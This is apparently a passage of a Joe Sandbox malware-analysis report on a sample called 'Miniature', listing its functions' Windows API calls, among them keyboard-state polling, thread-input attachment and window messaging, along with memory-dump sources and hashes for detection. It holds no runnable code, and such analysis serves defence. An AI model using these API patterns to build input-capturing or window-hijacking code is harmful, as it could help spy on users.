                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C7042A
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C7047D
                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C70491
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C704A6
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00C704B3
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C704BC
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C704CE
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C704D9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b18849719118f7bd862066baec20c14b9bbdf6399f9f548ec6262a03d0353eec
                                                                                                                                                                                                                                                                                            • Instruction ID: a270a47a3b4167e19e09978e07edbb3d59b7bad4922ae46af8b827247726e191
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b18849719118f7bd862066baec20c14b9bbdf6399f9f548ec6262a03d0353eec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78415075A00219DFCB10DF64D848AEE7BB9FF48348F108069E91AA7261C734A945CF90
                                                                                                                                                                                                                                                                                            Function 00C7A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7A65D
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C7A6DE
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C7A6F9
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C7A713
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C7A728
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C7A740
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C7A752
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C7A76A
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C7A77C
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C7A794
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C7A7A6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a906ee7abd5710d23b85210b296891b1742cb6b885d08d1b8734f9ed8728309b
                                                                                                                                                                                                                                                                                            • Instruction ID: 4778ad03aec9236f0212a9c01a0789e422403ff284fcf4050d79a5db32c66f16
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a906ee7abd5710d23b85210b296891b1742cb6b885d08d1b8734f9ed8728309b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9741A8645047C96DFF39576088443ADBEB06B95344F08C05DD5EB4B5C2EB949BC4C753
                                                                                                                                                                                                                                                                                            Function 00C99730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                            • Opcode ID: f90e252144f92d488b4f8495a2f5e963fdb87b8571331b9c9d16105c883f722f
                                                                                                                                                                                                                                                                                            • Instruction ID: 082e3767345799a96246fceb5fad16f20ad2b13439e2a1644c41b3e3fa308a6c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90e252144f92d488b4f8495a2f5e963fdb87b8571331b9c9d16105c883f722f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151B031A001169BCF14DFACC9559BEB7A5EF25360B21422DE83AE72C4DB31DE41D790
                                                                                                                                                                                                                                                                                            Function 00C94189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 00C941D1
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C941DC
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00CB0B44,?), ref: 00C94236
                                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00C942A9
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C94341
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C94393
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                            • Opcode ID: cf2f241055485a3a9f96cbcd18fb3e3168f105b770e4748dbb85bcbebb81d5bc
                                                                                                                                                                                                                                                                                            • Instruction ID: f542306527e0416d9beabbf0dc92fa06d2c92d9d0775d707a4d242f8f16c719e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf2f241055485a3a9f96cbcd18fb3e3168f105b770e4748dbb85bcbebb81d5bc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09618B716087019FCB14DF65C888F6EBBE4BF49714F00091AF9869B2A1C770ED49CB92
                                                                                                                                                                                                                                                                                            Function 00C88BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00C88C9C
                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C88CAC
                                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C88CB8
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C88D55
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88D69
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88D9B
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C88DD1
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88DDA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: b0eefb057387414885dc70bd9c38e977b088f6ea9e44c0520d3e7434bcffbfaf
                                                                                                                                                                                                                                                                                            • Instruction ID: bede8375b58a52f4b754184dc36bc4c124a2b5f292f5def6f205611975c2503f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0eefb057387414885dc70bd9c38e977b088f6ea9e44c0520d3e7434bcffbfaf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79619D72504305AFCB10EF60C880A9EB3E8FF89314F40491EF999C7251DB31EA49DB96
                                                                                                                                                                                                                                                                                            Function 00CA46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00CA4715
                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00CA4724
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA47AC
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00CA47C0
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00CA47CA
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA47F7
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00CA47FF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                            • Opcode ID: 5f464f7bbe73a69831df0ba98d4b9145259e16674bb41666fc187fbf0ce2776a
                                                                                                                                                                                                                                                                                            • Instruction ID: 240d2e054b17c5ada163f2d87615f99926ada1bbc3701f1cc76f0e136f5af8ee
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f464f7bbe73a69831df0ba98d4b9145259e16674bb41666fc187fbf0ce2776a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20416E75A01246EFDB18CF64D884FAE7BB5FF8A318F144028FA5697390D7B4A910CB50
                                                                                                                                                                                                                                                                                            Function 00C7282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C728B1
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C728BC
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C728D8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C728DB
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C728E4
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C728F8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C728FB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c7519a17a3c01364b64373d253dcc187e9b412c355754d8c792c886b3b00969
                                                                                                                                                                                                                                                                                            • Instruction ID: 12db0bfb68cbe20cd9b6d403aefd59ed4101b65a7d3db25ef12e5ea2702575c7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7519a17a3c01364b64373d253dcc187e9b412c355754d8c792c886b3b00969
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F21D475900118BBCF14AFA0CC85EEEBBB4EF06350F004156B966A32A1DB354959EB60
                                                                                                                                                                                                                                                                                            Function 00C7290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C72990
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C7299B
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C729B7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C729BA
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C729C3
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C729D7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C729DA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: b2709c68b32b59336f3e936bc9dcd539862e980c2733ab9606f30df4ccb5c11c
                                                                                                                                                                                                                                                                                            • Instruction ID: d36280fabcc06134d23845e9b6f60f95ea8cf1a9911a4b7add1767b7698b5c12
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2709c68b32b59336f3e936bc9dcd539862e980c2733ab9606f30df4ccb5c11c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C21F675D00114BBCF04AFA0CC45FEEBBB8EF06340F004056BA66932A5CB354949EB60
                                                                                                                                                                                                                                                                                            Function 00CA44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CA4539
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CA453C
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA4563
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CA4586
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CA45FE
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CA4648
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CA4663
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CA467E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CA4692
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CA46AF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 265fdda6ea219624b2d5213845182f2484b195bc86565ab1a8212df611fcbfab
                                                                                                                                                                                                                                                                                            • Instruction ID: 27f3d0a4d4151b84b0cc33c0790e3c0597f380d77d47ee10455165bea222a7a3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 265fdda6ea219624b2d5213845182f2484b195bc86565ab1a8212df611fcbfab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14619F75900249AFDB14DFA4CC81FEE77B8EF4A314F100155FA14E7291C7B4AA45DB50
                                                                                                                                                                                                                                                                                            Function 00C7BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C7BB18
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB2C
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C7BB33
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB42
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7BB54
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB6D
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB7F
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BBC4
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BBD9
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BBE4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f55074db48024f368155801adf99c8a0b35ca498e434ba92d70c380054bf8d08
                                                                                                                                                                                                                                                                                            • Instruction ID: 628d77e450abf4acdd42f05b2cd6b4f373c16c5b35cc8f858ef2cc333a67d203
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f55074db48024f368155801adf99c8a0b35ca498e434ba92d70c380054bf8d08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A319E72904204EFDB189F25DCC8FAD77ADEB49326F108025FE1ADB1A4D7B49E408B64
